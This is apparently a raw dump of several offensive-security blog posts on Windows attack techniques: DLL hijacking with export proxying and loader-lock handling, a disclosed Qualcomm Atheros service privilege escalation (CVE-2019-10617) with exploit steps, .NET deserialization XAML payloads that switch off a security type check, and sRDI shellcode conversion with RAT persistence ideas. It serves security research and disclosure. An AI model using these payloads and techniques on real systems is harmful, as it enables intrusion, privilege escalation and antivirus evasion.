ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code
Takeaway

Hijacks are more complicated to implement when part of a static sink. We need to ensure our export table supplies the required import names of our parent module before we have control over execution. In addition, by the time we have control of execution the addresses in our EAT will have already been patched into the parent module. This complicates any solution which would just rebuild the export table at run time.

Function Proxying

Maintaining stability in our source process demands that we proxy functionality to the real DLL (if there is one). This essentially means, through one means or another, linking our export table to the export table of the real DLL. Game hackers have been using this for a long time, but like hikers and hunters, the knowledge was slow to propagate to network security spheres. Here are some references links that tackle proxying through different methods:

And here are some projects that implement these methods:

These techniques all accomplish the same outcome through slightly different means. Let’s take a quick look at some strategies for better understanding.

Export Forwarding

PE files provide a simple mechanism for redirecting exports to another module. We can take advantage of this and simply point our names at the same export from the real DLL. You can either rename the real file or just use the full path. Most do this using linker directives like so:

#pragma comment(linker,"/export:ReadThing=real.ReadThing")
#pragma comment(linker,"/export:WriteThing=real.WriteThing")
#pragma comment(linker,"/export:DeleteThing=real.#3")
#pragma comment(linker,"/export:DoThing=C:\\Windows\\real.DoThing")
// ...

Very easy, and we offload the work to the loader subsystem. It might look a bit obvious that we are attempting a hijack (e.g. every export is forwarded), but the advantage lies in its simplicity. One downside is the requirement to modify source code and/or build processes to prepare a DLL for hijacking, we’ll solve this later.

The traditional format for the module name was *without* the “.dll” extension when defining a forward. Nowadays this doesn’t matter as the LDR subsystem has learned to ignore it. However, older systems like Windows 7 / Server 2008 will still fail if an extension is included. They also might crash when error reporting is attempted due to LdrUnloadDll being called too early.

Stack Patching

An equally elegant, but more dynamic approach is to walk the stack backward from DllMain and replace the return value for the LoadLibrary call above us with a different module handle. As a result, any future calls to lookup functions will simply bypass us completely. It should be no surprise to the reader at this point, but this technique will only work for dynamic sinks. With static sinks, the LDR subsystem has already validated our export table and patched IATs with its values, nor does it care what we have to say about module handles.

Preempt mentions this in a post about Vault 7 techniques, but they don’t go into much detail. Luckily we’re crazy enough to try this stuff, so we’ve written a small PoC which should demo the trick nicely for anyone who wants to run with it.

https://gist.github.com/monoxgas/b8a87bec4c4b51d8ac671c7ff245c812

Run Time Linking

Here we create a hollow list of function pointers, and compile our export table to reference them. The names will be there, but the functions themselves won’t go anywhere useful. When we gain control in DllMain, we load the real DLL dynamically and remap all of the function pointers at run time. This is essentially re-implementing export forwarding…. but with more code. We still have the same disadvantage of modifying source and/or build processes.

EXPORTS

ReadThing=ReadThing_wrapper @1
WriteThing=WriteThing_wrapper @2
DeleteThing=DeleteThing_wrapper @3
.code
extern ProcList:QWORD
ReadThing_wrapper proc
	jmp ProcList[0*8]
ReadThing_wrapper endp
WriteThing_wrapper proc
	jmp ProcList[1*8]
WriteThing_wrapper endp
DeleteThing_wrapper proc
	jmp ProcList[2*8]
DeleteThing_wrapper endp
extern "C" UINT_PTR ProcList[3] = {0};

extern "C" void ReadThing_wrapper();
extern "C" void WriteThing_wrapper();
extern "C" void DeleteThing_wrapper();

LPCSTR ImportNames[] = {
   "ReadThing",
   "WriteThing",
   "DeleteThing"
}

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	HANDLE real_dll = LoadLibrary( "real.dll" );
	for ( int i = 0; i < 3; i++ ) {
		ProcList[i] = GetProcAddress(real_dll , ImportNames[i]);
	}

	return TRUE;
}

Run-Time Generation

We could also go crazy and just re-build the entire export address table at run time. Here we need not know what DLL we are going to hijack when we write our code, which is nice. We can also add a basic function which re-implements the Windows search order to try and locate the real DLL dynamically. It could also perform basic alterations like .old and .bak within the current directory just in case.

HMODULE FindModule(HMODULE our_dll)
{
	WCHAR our_name[MAX_PATH];
	GetModuleFileName(our_dll, our_name, MAX_PATH);

	// Locate real DLL using our_name

	if (our_dll != module){
		return module;
	}
}

void ProxyExports(HMODULE module) 
{
	HMODULE real_dll = FindModule(module);

	// Rebuild our export table with real_dll

	return;
}

BOOL WINAPI DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	ProxyExports(module);

	return TRUE;
}

This strategy, while elegant, suffers from being so dynamic. We no longer include the export names in our static table unless we explicitly add them (re: static sinks). In addition, we receive execution after the import tables (IATs) of other modules might already contain references to our old export table (static sinks again). There is no easy fix for the former that keeps us dynamic unless we simply add every export name we might expect to need across all DLLs. To fix the latter, we need to iterate loaded modules and patch in addresses to the real DLL. Nothing some code can’t solve, but a convoluted solution to some eyes. The bulk of this strategy can be found in the Koppeling project below.

Another caveat is that references to, and within, the export table are relative virtual addresses (RVAs). Because of their size (DWORD), we are limited to placing our new export table somewhere within 4GB of the PE base unless it can fit inside the old one. Not an issue on x86, but certainly on x64.

Takeaway

Export forwarding is the easiest solution when it comes to proxying functionality. It’s preparatory (we need to create the DLL with a specific hijack in mind), but the loader subsystem does the heavy lifting. We can make some nice improvements to the preparation process itself which we’ll look at later. We like the flexibility of run-time generation, but it has weaknesses regarding static-sinks and their requirement for export names to be included in the file on disk. When it comes down to it, we might as well automate export forwarding.

Loader Lock

The LDR subsystem holds a single list of loaded modules for the process. To solve any thread sharing issues, a “loader lock” is implemented to ensure only one thread is ever modifying a module list at one time. This is relevant for hijacking as we typically gain code execution inside DllMain, which occurs while the LDR subsystem is still working on the module list. In other words, ntdll has to pass execution to us while the loader lock is still being held (not ideal). As a consequence, Microsoft provides a big list of things you certainly SHOULD NOT DO while inside DllMain.

  • Call LoadLibrary or LoadLibraryEx (either directly or indirectly). This can cause a deadlock or a crash.
  • Call GetStringTypeA, GetStringTypeEx, or GetStringTypeW (either directly or indirectly). This can cause a deadlock or a crash.
  • Synchronize with other threads. This can cause a deadlock.
  • Acquire a synchronization object that is owned by code that is waiting to acquire the loader lock. This can cause a deadlock.
  • Initialize COM threads by using CoInitializeEx. Under certain conditions, this function can call LoadLibraryEx.
  • Call the registry functions. These functions are implemented in Advapi32.dll. If Advapi32.dll is not initialized before your DLL, the DLL can access uninitialized memory and cause the process to crash.
  • Call CreateProcess. Creating a process can load another DLL.
  • Call ExitThread. Exiting a thread during DLL detach can cause the loader lock to be acquired again, causing a deadlock or a crash.
  • Call CreateThread. Creating a thread can work if you do not synchronize with other threads, but it is risky.
  • Use the memory management function from the dynamic C Run-Time (CRT). If the CRT DLL is not initialized, calls to these functions can cause the process to crash.
  • Call functions in User32.dll or Gdi32.dll. Some functions load another DLL, which may not be initialized.
  • Use managed code.

Scary list, right?

In our experience, however, this list is not as bad as it might appear. For example, LoadLibrary is typically safe to call within DllMain. In fact during static sinks, the loader lock is not re-acquired as long as the same thread is still in initialization. The call to LdrLoadDll will simply re-trigger dependency graph calculation and initialization. Does this mean that Microsoft is wrong to publish the list above? Absolutely not. They are just trying to prevent issues wherever possible.

The real answer to “Can I do <questionable thing> inside DllMain?” is typically “it depends, but avoid trying it”. Let’s check out one example where LDR synchronization can cause a deadlock:

DWORD ThreadFunc(PVOID param) {
	printf("[+] New thread started.");
	return 1;
}

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	DWORD dwThread;
	HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

	// Deadlock starts here
	WaitForSingleObject(hThread, INFINITE);

	return TRUE;
}

Regardless of the sink we use, our DllMain will get stuck waiting for the new thread to finish, but the new thread will be waiting for us to finish. You can see this in the two call stacks for the threads:

...
ntdll!LdrpCallInitRoutine
Theif!DllMain
KernelBase!WaitForSingleObjectEx
ntdll!NtWaitForSingleObject <- Waiting for the thread
ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!NtWaitForSingleObject <- Waiting for LdrpInitCompleteEvent
         (can also be NtDelayExecution/LdrpProcessInitialized != 1)

Inside a dynamic sink, you’ll probably see the deadlock occur in LdrpDrainWorkQueue (as the process has already been initialized by then).

ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeThread
ntdll!LdrpDrainWorkQueue
ntdll!NtDelayExecution <- Waiting for LdrpWorkCompleteEvent

This outcome is frustrating, because starting a new thread is the easiest way to avoid LDR conflicts. We can collect execution in DllMain, kick off a new thread, and let our malicious code run there once the process has finished initializing. To avoid the deadlock, we could remove the WaitForSingleObject call like so:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
    if (reason != DLL_PROCESS_ATTACH)
        return TRUE;

    DWORD dwThread;
    HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

    // WaitForSingleObject(hThread, INFINITE);

    return TRUE;
}

This works if the process stays up long enough for our code to execute, but this is a rare occurrence. Most likely, we will return execution to the primary module and it will exit quickly or throw an error if we haven’t done proxying properly. Our thread will never get a chance to do anything useful.

Hooking for Stability

Lucky for us, we do hold execution long enough to implement a hook, so we can try to take over primary execution once LDR is done. Where exactly we place this hook is going to depend on where in the execution chain we sit.

  • Pre-Load: The process is still being initialized and execution has not been handed over to the primary module. In this case, we’d likely want to hook the entry point of the primary module.
  • Post-Load: The process has already started core execution, and we might be loaded as a consequence of a LoadLibrary call. The most optimal is to just hook the last function in the call stack which is part of the primary module. Whatever issues/errors bubble up can be ignored then.

To differentiate between these two scenarios was can just keep walking backward in the stack. If we find a return address for the primary module, we are probably post-load. Otherwise, the process likely hasn’t kicked off yet and the entry point is our best bet. Naturally, we’ve built a proof of concept already so you don’t have to pull your hair out:

https://gist.github.com/monoxgas/5027de10caad036c864efb32533202ec

Takeaway

Loader lock represents some challenges, but nothing too difficult as long as we respect it. Starting a separate thread for any significant code is the best option. In situations where we need to keep the process alive so the thread can continue run, we can use function hooking.

Koppeling

We started this post by introducing various complexities of hijacking. Let’s review and pair them up with relevant solutions:

  1. Stability of the source process: Use function proxying, avoid loader lock.
  2. Maintaining code execution inter-process: Use proxying and/or function hooking.
  3. Complexities of loader lock: Use new threads and/or function hooking.
  4. Static export names: Use post-build cloning, static definitions, linker comments, etc.

If there is one thing to communicate however, the solution space is quite large and everyone will have preferences. Our current “best” implementation combines the simplicity of export forwarding with post-build patching for flexibility. The process goes like this:

  1. We compile/collect our “evil” DLL for hijacking. It doesn’t need to be aware of any hijacking duty (unless you need to add hooking).
  2. We clone the exports of a reference DLL into the “evil” DLL. The “real” DLL is parsed and the export table is duplicated into a new PE section. Export forwarding is used to correctly proxy functionality.
  3. We use the freshly cloned DLL in any hijack. Stability is guaranteed and we can maintain execution inter-process.

We’re releasing a project to demonstrate this, and some other, advanced hijacking techniques called Koppeling. Much like our sRDI project, it allows you to prepare any arbitrary DLL for hijacking provided you know the final path of the reference DLL. We hope you find use for it and contribute if you love hijacking as much as we do.

https://github.com/monoxgas/Koppeling

Wrap Up

Our team is very passionate about not only how to weaponize a technique, but how to do it with stability and poise. We want to avoid impact to customer environments at all costs. This kind of care demands hours of research, testing, and development. Our Slingshot toolkit maintains seamless integration with the techniques we’ve detailed here to ensure our team and others can take full advantage of hijacking. As mentioned earlier, we also dive deeper into these topics in our Dark Side Ops course series if you’re hungry for more.

We hope this post has provided a deeper understanding of this often misrepresented technique. Till next time.

– Nick (@monoxgas)

[post_title] => Adaptive DLL Hijacking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adaptive-dll-hijacking [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:26:09 [post_modified_gmt] => 2023-04-14 14:26:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23530 [menu_order] => 525 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 23532 [post_author] => 77 [post_date] => 2019-10-09 07:00:17 [post_date_gmt] => 2019-10-09 12:00:17 [post_content] =>

Discovery

In DbgView one day, I noticed repeated noisy output from a particular process. The pestering output bothered me enough to do some investigating. The offender was C:\Windows\System32\Drivers\AdminService.exe, the binary backing the AtherosSvc Windows service. This is installed as part of the Qualcomn Atheros wireless/bluetooth chip set drivers (QCA61x4 in my case). I began reversing the binary to track down the verbosity and look for security issues while I was at it.

While there were no symbols for the binary, the authors had kindly included so many debug print statements that contextualizing the logic was rather easy. The majority of it’s code was fairly boilerplate for a Windows service and included some threading, hardware management, and registry management. Initially, I just went hunting for any uses of useful WinAPIs (file management, ACL modification, process handling, token duplication, etc). This led me to an interesting function which appears to perform arbitrary registry work using some INI file contents. It looked something like this:

LPWSTR ini_path[520];
SHGetSpecialFolderPathW(0, &ini_path, 35, 0); // %ProgramData%
wcscpy_s(&ini_path, 260, L"\\Atheros\\AtherosServiceConfig.ini");

LPSTR str_op_type[2];
LPSTR reg_path[260];
GetPrivateProfileStringW(L"AthService", L"regOpType", 0, str_op_type, 2, &ini_path);
GetPrivateProfileStringW(L"AthService", L"regPath", 0, reg_path, 260, &ini_path);

DWORD op_type = convert_to_int(str_op_type);
DWORD top_key = get_top_key_from_path(reg_path);

HANDLE hKey, hSubKey;

if (op_type == 1)
{
    LPSTR reg_value[260];
    GetPrivateProfileStringW(L"AthService", L"regValue", 0, reg_value, 260, &ini_path);
    
    // Delete registry value

} 
else if (op_type == 2)
{
    
    LPSTR reg_value[260];
    LPSTR reg_data[260];
    GetPrivateProfileStringW(L"AthService", L"regValue", 0, reg_value, 260, &ini_path);
    GetPrivateProfileStringW(L"AthService", L"regData", 0, reg_data, 260, &ini_path);

    LPSTR str_reg_type[2];
    GetPrivateProfileStringW(L"AthService", L"regType", 0, str_reg_type, 2, &ini_path);
    DWORD reg_type = convert_to_int(convert_to_int);

    // Create reg value

} 
else if (op_type == 3)
{
    // Delete registry key
}

A quick check on my host showed that, for some reason, C:\ProgramData\Atheros did not exist. ProgramData is writable by any user, so our primitive was looking good. The next challenge was triggering this block of code on demand. I traced back references to the registry function to find a looping ThreadProc function which implemented most of the actual logic for the app.

DWORD ThreadProc(PVOID param){
    MSG msg;

    while (true) {
        GetMessageW(&msg, 0i64, 0, 0);

        switch (msg){
            // ...

            case 0x5E62:
                OutputDebugStringW(L"Enter case CUSTOM_THREAD_EVENT_REG_MODIFY!\n");
                do_unsafe_registry_work();
                SetEvent(g_RegEvent);
                break;
        }
    }
}

If we continue following this thread, we discover this thread message code is posted when a specific custom control code is delivered to the service.

DWORD Handler(DWORD dwControl, ...)
{
    switch (dwControl){
        // ...

        case 133:
            ResetEvent(g_RegEvent);
            PostThreadMessageW(dwThread, 0x5E62u, 0, 0);
            WaitForSingleObject(g_RegEvent, 20000);
            break;
    }
}

*facepalm*, It really is as easy as that. I’m not sure why this code flow exists, and even more unsure why that directory and INI file are never created.

Exploitation

1 – Create C:\ProgramData\Atheros\AtherosServiceConfig.ini and set it’s contents to:

[AthService]
regOpType=3
regPath=HKEY_LOCAL_MACHINE\Software
regValue=RuhRoh
regType=1
regData=ThisAintGood

2 – Send the control code to the service

sc control AhterosSvc 133

It’s trivial to stretch full registry control as SYSTEM into privileged code execution, but I’ll leave that as an exercise for the reader.

The Fix

In response to this, it appears Qualcomm have simply removed the registry modification code completely. The ThreadProc case now looks something like this:

while (true) {
    GetMessageW(&msg, 0i64, 0, 0);

    switch (msg){
        // ...

        case 0x5E62:
            OutputDebugStringW(L"Enter case CUSTOM_THREAD_EVENT_REG_MODIFY!\n");
            // do_unsafe_registry_work();
            break;
    }
}

Funny enough they left the custom control code (133) hooked up to PostThreadMessage resulting in a useless 20 second wait for g_RegEvent to be reset. Suppose this could be a simple indicator to check for a vulnerable host.

Here are the details for the fixed version (for me anyways):

%SystemRoot%\System32\drivers\AdminService.exe

Version: 10.0.10011.16384
Modified: 08/08/2019
SHA1: 0d21b5fa49ab62b6e8fea82e1da3980092b95c70

Timeline

[9/12/19] – Delivered initial report to product-security@qualcomm.com
[9/12/19] – Received initial ticket creation receipt (QPSIIR-1287)
[9/26/19] – Received notice that this issue was reported in April and was a duplicate report. The original reporter was @DownWithUpSec, and you can find his write-up of the vulnerability here.
[10/07/19] – CVE-2019-10617 is published in the October 19 Security Bulletin

[post_title] => CVE-2019-10617 – AtherosSvc Registry LPE [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2019-10617 [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:22:33 [post_modified_gmt] => 2023-04-14 14:22:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23532 [menu_order] => 541 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 23534 [post_author] => 77 [post_date] => 2019-06-04 07:00:48 [post_date_gmt] => 2019-06-04 07:00:48 [post_content] =>

In 2017, James Forshaw released a DotNet deserialization gadget which abuses the ActivitySurrogateSelector class from System.Workflow.ComponentModel. As detailed in his post, this gadget is particularly useful, providing cross-version support and the ability to load arbitrary assemblies into memory (as compared to the common Process.Start technique). However, in newer versions of the DotNet framework (4.8+), this gadget was apparently fixed. We rely on this gadget in some of our stage 0 payloads and were interested in finding a workaround. This is a short post detailing our solution.

The Fix

For those who didn’t read Forshaw’s post (you should), the ActivitySurrogateSelector class unintentionally provides a generic wrapper for typically unserializable classes. This is great for complex gadget design because it means you are no longer limited to types marked as Serializable. The particular chain James created to abuse this behavior is quite amazing, and worth analyzing if you get a chance.

To examine how Microsoft patched this problem, I cracked open a patched copy of the System.Workflow.ComponentModel.dll. Comparing against the previous code, we see that a type check has been added to the GetObjectData function, ensuring that only an ActivityBind or DependencyObject can be wrapped with the surrogate.

private sealed class ObjectSurrogate : ISerializationSurrogate
{
	public void GetObjectData(object obj, SerializationInfo info, StreamingContext ctx)
	{
		if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck &&
			!(obj is ActivityBind) && !(obj is DependencyObject))
		{
		   throw new ArgumentException("obj");
		}
		// ...
	}
}

As expected, they also added what appears to be a new option (still undocumented) which disables the type check in the off chance that it breaks something. If we trace DisableActivitySurrogateSelectorTypeCheck we also discover a core reason that this gadget, in particular, was likely fixed so quickly.

internal static bool DisableActivitySurrogateSelectorTypeCheck
{
	get
	{
		if (NativeMethods.IsDynamicCodePolicyEnabled())
			return false;

		AppSettings.EnsureSettingsLoaded();
		return AppSettings.disableActivitySurrogateSelectorTypeCheck;
	}
}

As the gadget can be used to trigger arbitrary assembly loads, a call to IsDynamicCodePolicyEnabled was added to ensure the type white-list is always enforced if WLDP (Device Guard) is enabled. We aren’t concerned with WLDP, therefore we’re left with AppSettings.disableActivitySurrogateSelectorTypeCheck. Underneath this flag maps to ConfigurationManager.AppSettings which typically refers to policies in an app or web.config file.

NamedValueCollection collection = ConfigurationManager.AppSettings;

bool.TryParse(
collection["microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"],
out AppSettings.disableActivitySurrogateSelectorTypeCheck
)

So we just need a way to configure a setting for an application we don’t control, which is actually easier than you might think. See ActivitySurrogateSelector was fixed, but many other DotNet gadgets are still in working order. Most of them, implemented in ysoserial.net, are configured to execute Process.Start with a target command line. Re-purposing them to instantiate a class from an arbitrary assembly would take serious wizardry, but luckily we only need them to do one thing, Disable the type check.

Retooling

The newest kid on the gadget block is TextFormattingRunProperties, discovered by Oleksandr Mirosh. Like many other gadgets, it relies on having controlled input to a XamlReader.Parse call. The core exploitation of this input depends on the ObjectDataProvider element. These are typically used to connect UI elements (TextBox/ComboBox) to custom objects or code. These objects and their capabilities are fascinating in their own right, and worth additional research. The typical template for a Process.Start call looks something like this:

<ResourceDictionary
        xmlns="https://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="https://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
     <ObjectDataProvider x:Key="Calc" ObjectType = "{x:Type Diag:Process}" MethodName = "Start" >
     <ObjectDataProvider.MethodParameters>
        <System:String>cmd</System:String>
        <System:String>/c calc </System:String>
     </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>

As the XML is parsed, the ObjectDataProvider object is created, and the target method is immediately executed to prepare results. To re-use this, we’ll need to somehow connect an ObjectDataProvider entry to AppSettings.disableActivitySurrogateSelectorTypeCheck. To start, I came up with the following C# code to disable the type check:

ConfigurationManager.AppSettings.Set(
	"microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck",
	"true"
);

To reproduce this code with XAML input, we’ll actually need two ObjectDataProvider objects. This is because AppSettings is retrieved from the static ConfigurationManager class, followed by the instance method Set(). We can replace ObjectType with ObjectInstance to get this sequential behavior. Also worth noting that because of overrides, the Add() method of AppSettings will throw an exception, but Set works just fine for us.

<ResourceDictionary
        xmlns="https://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="https://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:Config="clr-namespace:System.Configuration;assembly=System.Configuration">
    <ObjectDataProvider x:Key="appSettings" ObjectType = "{x:Type Config:ConfigurationManager}" MethodName = "get_AppSettings" ></ObjectDataProvider>
    <ObjectDataProvider x:Key="setMethod" ObjectInstance = "{StaticResource appSettings}" MethodName = "Set" >
        <ObjectDataProvider.MethodParameters>
            <System:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</System:String>
            <System:String>true</System:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>

Now that we have a payload for disabling the type check, we just need to execute it before our original ActivitySurrogateSelector gadget. We could obviously do this manually through whichever entry vector we have. The setting should be persistent during the life of an app instance, so sending the disable payload once would suffice for most scenarios.

Update: After additional testing, I discovered the technique of stacking objects in a list won’t work. This is because an exception is thrown while deserializing the first object, causing the second object to never be touched.

string disable_xaml = @"...";

TextFormattingRunPropertiesMarshal disable_payload = 
    new TextFormattingRunPropertiesMarshal(disable_xaml);

List<Object> object_group = new List<Object>();

object_group.Add(original_payload);
object_group.Add(disable_payload);

return Serialize(object_group, ...)

Wrapping Up

Fixing only one of the available gadgets, but leaving the rest, is a recipe for disaster. Depending on your motivation, many of the existing gadgets can be retooled for interesting purposes beyond starting a process. I just really liked ActivitySurrogateSelector and wanted to keep it around.

I’ve submitted a PR for ysoserial.net to support this new bypass.

– Nick (@monoxgas)

Update – 6/6/19

After some additional work on the gadget, some changes have been made to support more scenarios.

The reference made to ConfigurationManager.AppSettings only occurs if the internal Workflow.ComponentModel.AppSettings has not yet been initialized:

if (!AppSettings.settingsInitialized)
{
    ... // Read in values from the global config

    AppSettings.settingsInitialized = true;
}

Therefore if the disableTypeCheck flag has ever been queried before, our original payload will make no difference. To fix this, I’ve added some System.Reflection calls using ObjectDataProviders to manually set the internal Workflow boolean value. In addition, I found a slightly simpler way to access the static ConfigurationManager.AppSettings class.

<ResourceDictionary
    xmlns="https://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="https://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:s="clr-namespace:System;assembly=mscorlib"
    xmlns:c="clr-namespace:System.Configuration;assembly=System.Configuration"
    xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib">
    <ObjectDataProvider x:Key="type" ObjectType="{x:Type s:Type}" MethodName="GetType">
        <ObjectDataProvider.MethodParameters>
            <s:String>System.Workflow.ComponentModel.AppSettings, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</s:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <ObjectDataProvider x:Key="field" ObjectInstance="{StaticResource type}" MethodName="GetField">
        <ObjectDataProvider.MethodParameters>
            <s:String>disableActivitySurrogateSelectorTypeCheck</s:String>
            <r:BindingFlags>40</r:BindingFlags>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <ObjectDataProvider x:Key="set" ObjectInstance="{StaticResource field}" MethodName="SetValue">
        <ObjectDataProvider.MethodParameters>
            <s:Object/>
            <s:Boolean>true</s:Boolean>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <ObjectDataProvider x:Key="setMethod" ObjectInstance="{x:Static c:ConfigurationManager.AppSettings}" MethodName ="Set">
        <ObjectDataProvider.MethodParameters>
            <s:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</s:String>
            <s:String>true</s:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>
[post_title] => Re-Animating ActivitySurrogateSelector [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => re-animating-activitysurrogateselector [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:28:46 [post_modified_gmt] => 2023-04-14 14:28:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23534 [menu_order] => 547 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 25106 [post_author] => 77 [post_date] => 2017-08-23 11:18:00 [post_date_gmt] => 2017-08-23 11:18:00 [post_content] =>

During our first offering of “Dark Side Ops II – Adversary Simulation” at Black Hat USA 2017, we quietly dropped a piece of our internal toolkit called sRDI. Shortly after, the full project was put on GitHub (https://github.com/monoxgas/sRDI) without much explanation.  I wanted to write a quick post discussing the details and use-cases behind this new functionality.

A Short History

Back in ye olde times, if you were exploiting existing code, or staging malicious code into memory, you used shellcode. For those rare few who still have the skill to write programs in assembly, we commend you. As the Windows API grew up and gained popularity, people found sanctuary in DLLs. C code and cross compatibility were very appealing, but what if you wanted your DLL to execute in another process? Well, you could try writing the file to memory and dropping a thread at the top, but that doesn’t work very well on packed PE files. The Windows OS already knows how to load PE files, so people asked nicely and DLL Injection was born. This involves starting a thread in a remote process to call “LoadLibrary()” from the WinAPI. This will read a (malicious) DLL from disk and load it into the target process. So you write some cool malware, save it as a DLL, drop it to disk, and respawn into other processes. Awesome!…well, not really. Anti-virus vendors caught on quick, started flagging more and more file types, and performing heuristic analysis. The disk wasn’t a safe place anymore!

Finally in 2009, our malware messiah Stephen Fewer (@stephenfewer) releases Reflective DLL Injection. As demonstrated, LoadLibrary is limited in loading only DLLs from disk. So Mr. Fewer said “Hold my beer, I’ll do it myself”. With a rough copy of LoadLibrary implemented in C, this code could now be included into any DLL project. The process would export a new function called “ReflectiveLoader” from the (malicious) DLL. When injected, the reflective DLL would locate the offset of this function, and drop a thread on it. ReflectiveLoader walks back through memory to locate the beginning of the DLL, then unpacks and remaps everything automatically. When complete, “DLLMain” is called and you have your malware running in memory.

Years went by and very little was done to update these techniques. Memory injection was well ahead of it’s time and allowed all the APTs and such to breeze past AV. In 2015, Dan Staples (@_dismantl) released an important update to RDI, called “Improved Reflective DLL Injection“. This aimed to allow an additional function to be called after “DLLMain” and support the passing of user arguments into said additional function. Some shellcode trickery and a bootstrap placed before the call to ReflectiveLoader accomplished just that. RDI is now functioning more and more like the legitimate LoadLibrary. We can now load a DLL, call it’s entry point, and then pass user data to another exported function. By the way, if you aren’t familiar with DLLs or exported functions, I recommend you read Microsoft’s overview.

Making shellcode great again

Reflective DLL injection is being used heavily by private and public toolsets to maintain that “in-memory” street cred. Why change things? Well…

  • RDI requires that your target DLL and staging code understand RDI. So you need access to the source code on both ends (the injector and injectee), or use tools that already support RDI.
  • RDI requires a lot of code for loading in comparison to shellcode injection. This compromises stealth and makes stagers easier to signature/monitor.
  • RDI is confusing for people who don’t write native code often.
  • Modern APT groups have already implemented more mature memory injection techniques, and our goal is better emulate real-world adversaries.

The list isn’t as long as some reasons to change things, but we wanted to write a new version of RDI for simplicity and flexibility. So what did we do?

  1. To start, we read through some great research by Matt Graeber (@mattifestation) to convert primitive C code into shellcode. We rewrote the ReflectiveLoader function and converted the entire thing into a big shellcode blob. We now have a basic PE loader as shellcode.
  2. We wanted to maintain the advantages of Dan Staples technique, so we modified the bootstrap to hook into our new shellcode ReflectiveLoader. We also added some other tricks like a pop/call to allow the shellcode to get it’s current location in memory and maintain position independence.
  3. Once our bootstrap primitives were built, we implemented a conversion process into different languages (C, PowerShell, C#, and Python). This allows us to hook our new shellcode and a DLL together with the bootstrap code in any other tool we needed.

Once complete, the blob looks something like this:

When execution starts at the top of the bootstrap, the general flow looks like this:

  1. Get current location in memory (Bootstrap)
  2. Calculate and setup registers (Bootstrap)
  3. Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
  4. Un-pack DLL and remap sections (RDI)
  5. Call DLLMain (RDI)
  6. Call exported function by hashed name (RDI) – Optional
  7. Pass user-data to exported function (RDI) – Optional

With that all done, we now have conversion functions that take in arbitrary DLLs, and spit out position independent shellcode. Optionally, you can specify arbitrary data to get passed to an exported function once the DLL is loaded (as Mr. Staples intended). On top of that, if you are performing local injection, the shellcode will return a memory pointer that you can use with GetProcAddressR() to locate additional exported functions and call them. Even with the explanation, the process can seem confusing to most who don’t have experience with the original RDI project, shellcode, or PE files, so I recommend you read existing research and head over to the GitHub repository and dig into the code: https://github.com/monoxgas/sRDI

Okay, so what?

“You can now convert any DLL to position independent shellcode at any time, on the fly.”

This tool is mainly relevant to people who write/customize malware. If you don’t know how to write a DLL, I doubt most of this applies to you. With that said, if you are interested in writing something more than a PowerShell script or Py2Exe executable to perform red-teaming, this is a great place to start.

Use case #1 – Stealthy persistence

  • Use server-side Python code (sRDI) to convert a RAT to shellcode
  • Write the shellcode to the registry
  • Setup a scheduled task to execute a basic loader DLL
  • Loader reads shellcode and injects (<20 lines of C code)

Pros: Neither your RAT or loader need to understand RDI or be compiled with RDI. The loader can stay small and simple to avoid AV.

Use case #2 – Side loading

